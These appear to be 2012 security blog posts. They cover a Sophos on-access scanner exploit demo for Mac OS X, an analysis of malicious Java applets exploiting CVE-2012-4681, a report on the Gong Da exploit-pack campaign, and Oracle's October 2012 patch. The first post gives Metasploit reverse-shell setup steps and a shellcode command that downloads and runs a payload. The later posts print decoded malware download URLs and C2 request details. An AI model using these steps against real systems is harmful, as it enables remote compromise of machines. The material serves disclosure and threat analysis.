Vulnerabilities reported to vendor by Tavis Ormandy the 2012-09-10
Public release of the vulnerabilities by Tavis Ormandy the 2012-11-05
PoC provided by Tavis Ormandy the 2012-10-02
Sophos products for Mac OS X
Sophos products for Windows
Sophos products for Linux
…
Tested on Mac OS X 10.8.2 with :
Sophos Anti-Virus for Mac Home Edition
Description :
This PoC demonstrate one of the Sophos products vulnerabilities reported by Tavis Ormandy. This PoC exploit a PDF stack buffer overflow vulnerability present in Sophos onaccess scanner.
Demo :
1) Create a Mac OS X Metasploit payload:msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > mac_os_x_payload2) Modify Sophail shellcode.asm file with, for example:.command: db "curl -s http://192.168.178.26/mac_os_x_payload > mac_os_x_payload | chmod u+x mac_os_x_payload && ./mac_os_x_payload", 03) Make 4) Upload index.html, exploit.bin and exploit.png on a web server 5) Initiate a Metasploit multihandleruse exploit/multi/handler set PAYLOAD osx/x86/shell_reverse_tcp set LHOST 192.168.178.26 exploit -j6) On the target surf index.html file7) Exploit the session :)session -i 1 id /sbin/ifconfig uname -a
The 24 October, during my regular malware monitoring hobby, I observed a suspicious infected server in Taiwan (www.grvb.com.tw) who is actually still online. The home page of the server is loading a first Java Applet with a JAR file “Java.jar” and a second Java Applet as a single class file “eiAD.class“.
VirusTotal analysis of “Java.jar” (2990711e7cd04553260a6fbccf8ea6a6) reported 5/43 Java/Downloader detection, and analysis of “eiAD.class” (8d4ddd1e1f41a2e8e18da097ecafecbc) reported 5/44 CVE-2012-4681 Oracle Java Gondvv exploit detection. The detection rate is really low and a deeper analysis of these elements is interesting.
This JAR file contain a Manifest file how reveal that the file was compiled with “Java 1.6.0_29 (Sun Microsystems Inc.)” and the JAR file is signed with a RSA signature.
You can see this self-signed certificate was create the 16 October and was pretending to be generated by Microsoft and issued by Microsoft. By signing an applet, the restrictions on an applet are mostly removed. Signing an applet, basically means that the applet writer is vouching that the applet is safe. The user of a signed applet can accept the signed applet and have it run without most restrictions, or reject the applet and not have it run at all. A self-signed applet will trigger a security warning pop-up advising you on the associated risks. Similar self-signed Java Applet could be generated with java_signed_applet Metasploit exploit module.
By analyzing the source code of “Java.jar” we can see interesting arrays and functions.
The “FCKME” is an array where a space is representing a new entry in the array. The guys don’t seem to like ESET anti-virus editor of NOD-32 🙂
Encoded string is present and will be decoded by the beside “FJKOKL” function. You can see that the 29 value of the “FCKME” array will be used to complete the encoded text.
This function will remove all the “[>|<]” values of the encoded text with the following result.
The string is encoded in HEX and after decoding you will have the following result completed with “FCKME[29]” how is “.exe“.
“http://www.gvrb.com.tw/upload/user/files/num.exe” (this file is actually no more existing)
The following table will provide all value of “FCKME” array.
With all these value we are able to decode all “FCKME” variable used in the “Java.jar” code.
As you can see the Java.jar is only a self-signed Java downloader. Finally, as pointed by @_sinn3r, this Applet is surely used as a plan B, if eiAD.class is not triggered.
By analyzing the source code of “eiAD.class” we can see interesting arrays and functions.
This variable seem to be one more time an reference to ESET anti-virus editor and especially to the “Foxxy Software Outfoxed” blogpost. (Thanks to @binjo).
Encoded string is present and will be decoded by the beside “FJKOKL” function, also used in “Java.jar“. A space is representing a new entry in the “JFI” array.
“FJKOKL” will remove all the “[>|<]” values of the encoded text with the following result.
The string is encoded in HEX and after decoding you will have the following result.
“Nothing like sun. being a awt. Sometimes I put my SunToolkit in my asshole! You see the get is a Field that Name for .exe okay // I mean god damn the get is being set for the Security Manager for file:/ ! Got damn I want some milk from my mommies titz for that acc“.
The following table will provide all value of “JFI” array.
With all these value we are able to decode all “JFI” variable used in the “Java.jar” code.
With all these variables and other functions the code will be able to reconstruct CVE-2012-4681 Oracle Java vulnerability.
Another encoded string is present in “eiAD.class” and this encoded string has the same result as the “Java.jar“.
“http://www.gvrb.com.tw/upload/user/files/num.exe” (this file is actually no more existing)
I found a Author variable occurrence “lEZdLl.class” on pastebin who was posted by a Guest the 24 September, and is equivalent to “eiAD.class“.
“HGIDO” value of “lEZdLl.class” is “http://212.150.101.32/Facebook_msn.exe” (this file is actually no more existing).
Here under a demonstration video of the effectiveness of these files against anti-viruses.
You maybe remind end of August Java 0day, aka CVE-2012-4681. This 0day was found in an html page containing obfuscated JavaScript. The obfuscation was made by a tool initially called “Dadong’s JS Obfuscator“.
/*Encrypt By Dadong’s JSXX 0.44 VIP*/
This obfuscator was used, in the Java 0day case, to hide the presence of Chinese Gong Da Pack (aka Gondad).
The August version of Gong Da Pack was exploiting CVE-2012-4681 regarding the following diagram, but previous studies, in March, have reveal that this Pack was also dealing with CVE-2011-2140 (Adobe Flash Player), CVE-2012-0003 (Windows Multimedia Library) and CVE-2011-3544 (Oracle Java Rhino exploit).
A new version of Gong Da Pack is emerging, and is getting more complex. This version was discovered on “hxxp://qq.wangmazz.com/xx/index.html” a web site how is actually no more accessible.
“qq.wangmazz.com” was hosted on 210.56.55.106, AS38197, in Hong Kong and “wangmazz.com” domain name was created the 2012-10-19, through name.com registrar, for “jie jiu ([email protected])“.
The “index.html” file was containing JavaScript code obfuscated by the same obfuscator as for the Java 0day, but with a different name. I think we could simply rename “Dadong’s JS Obfuscator” to “JSXX VIP JS Obfuscator“. It seem that “Dadong’s” or “xx.xiamaqq.com” are the name of the campaigns. “index.html” file was recognized only by 9 on 44 anti-viruses on VirusTotal.com.
/*Encrypt By xx.xiamaqq.com’s JSXX 0.44 VIP*/
After de-obfuscation of the “index.html” file you can see that Gong Da Pack has involve to the following diagram.
Gong Da Pack is still dealing with CVE-2011-3544 (Oracle Java Rhino exploit) and CVE-2012-4681 (Oracle Java August 0day), has add CVE-2012-0507 (another Oracle Java exploit), CVE-2012-1723 (another Oracle Java exploit) and CVE-2012-1889 (Microsoft XML Core Services), but has removed CVE-2011-2140 (Adobe Flash Player) and CVE-2012-0003 (Windows Multimedia Library) for this campaign.
An interesting part discovered in the code is that the bad guys were trying to target Internet Explorer browsers with korean language support for CVE-2012-1889.
Here under some information s regarding the different files:
“qaz2.exe” PE32 executable is recognized as a trojan by 23/44 anti-viruses targeting online gamers. This file is downloaded from “xx.xiamaqq.com“, located on 210.56.55.161, , AS38197, in Hong Kong. “xiamaqq.com” domain name was also created the 2012-10-19, through name.com registrar, for “jie jiu ([email protected])“.
After installed “qaz2.exe” is connecting to “o108.cvnieksff.com” on 111.68.8.254, in Hong Kong. “cvnieksff.com” domain name was created the 2012-05-11, through enom.com registrar, for “Yu Yuming ([email protected])“. The first connection is HTTP GET method to “/jc/post.asp?d10=MACADDRESS&d11=ver-jc-119xx&d21=56&d22=OSTYPE“. Response to this method is:
In conclusion, Gong Da Pack (aka Gondad) seem to continue to target asian countries, and has involve in order to mostly use latest Oracle Java exploits. As you can see this campaign has target online gamers, what is steal not clear is when and how the August Java 0day has been pushed into Gong Da Pack.
Oracle has provide his Java Critical Patch Update (CPU) for October 2012 how has been released on Tuesday, October 16. This CPU contains 30 security vulnerability fixes and concern “Java Runtime Environment” and “JavaFX” components. On the 30 security vulnerabilities all of them may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0. 15 vulnerabilities have a CVSS base score upper or equal to 7.0.
As you may know Oracle is using CVSS 2.0 (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security researchers disagree with the usage of CVSS by Oracle. Oracle play with CVSS score by creating a “Partial+” impact rating how don’t exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.
